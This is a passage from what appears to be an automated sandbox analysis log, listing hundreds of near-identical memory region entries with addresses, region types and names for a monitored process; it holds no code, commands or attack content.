"private_0x0000000003d50000" filename = "" Region: id = 5936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5939 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5940 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5941 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5942 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5943 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5944 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5945 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5946 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5947 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5948 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5949 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5950 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5951 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5952 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5953 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5954 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5955 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5956 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5957 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5958 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5959 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5960 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5961 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5962 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5963 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5989 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5990 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5991 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5992 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5993 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5996 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5997 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5998 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5999 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6000 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6001 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6002 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6003 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6004 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6005 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6006 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6007 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6008 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6027 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6028 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6038 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6041 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6042 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6048 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6049 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6050 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6052 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6053 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6054 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6073 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6074 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6075 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6076 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6087 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6090 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6091 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6092 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6095 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6096 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6097 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6100 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6101 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6102 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6103 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6124 start_va = 0x610000 end_va = 